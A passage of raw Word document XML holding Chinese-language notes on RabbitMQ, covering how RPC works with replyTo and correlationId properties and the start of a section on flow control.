        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Remote Procedure Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，远程过程调用）。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中也支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="1901825"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="228" name="图片 5" descr="RabbitMQ基础概念详细介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abbitMQ基础概念详细介绍"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId313" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1901825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="12"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的机制是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767932" w:rsidRPr="00767932" w:rsidRDefault="00767932" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="29" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:after="115" w:line="230" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>客户端发送请求（消息）时，在消息的属性（</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MessageProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AMQP</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>协议中定义了</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，这些属性会随着消息一起发送）中设置两个值</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>replyTo</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>名称，用于告诉服务器处理完成后将通知我的消息发送到这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>correlationId</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（此次请求的标识号，服务器处理完成后需要将此属性返还，客户端将根据这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>了解哪条请求被成功执行了或执行失败）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767932" w:rsidRPr="00767932" w:rsidRDefault="00767932" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="29" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:after="115" w:line="230" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>服务器端收到消息并处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767932" w:rsidRPr="00767932" w:rsidRDefault="00767932" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="29" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:after="115" w:line="230" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>服务器端处理完消息后，将生成一条应答消息到</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>replyTo</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，同时带上</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>correlationId</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00767932" w:rsidRPr="00767932" w:rsidRDefault="00767932" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="29" w:color="CCCCCC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:spacing w:after="115" w:line="230" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>客户端之前已订阅</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>replyTo</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，从中收到服务器的应答消息后，根据其中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>correlationId</w:t>
      </w:r>
      <w:r w:rsidRPr="00767932">
        <w:rPr>
          <w:rFonts w:ascii="microsoft yahei" w:eastAsia="宋体" w:hAnsi="microsoft yahei" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属性分析哪条请求被执行了，根据执行结果进行后续业务处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A566E" w:rsidRPr="00767932" w:rsidRDefault="001A566E" w:rsidP="00B14FAB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="342" w:lineRule="atLeast"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F591A" w:rsidRDefault="007F591A" w:rsidP="007F591A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E3498F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流控制机制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00BA3092">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，消息可能被存储在多个不同的队列，消息越早被消费，那么消息经过的队列层次越少，则平均每个消息处理的开销就越小。但若接收消息的速率过快，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来不及处理，这些消息就可能进入很深层次的队列，大大增加平均每个消息的处理开销，进一步使得处理新消息和发送旧消息的能力减弱，更多的消息会进入很深的队列，循环往复，整个系统的性能就会极大的降低。另外若接收消息的速率过快还会实现某些进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mailbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过大，可能会产生很严重的后果。为此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RabbitMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设计了一套流控机制，本文从以下三个方面去阐述该流控机制是如何工作的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="378" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、关闭砸门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00313CF7" w:rsidRDefault="00313CF7" w:rsidP="00313CF7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
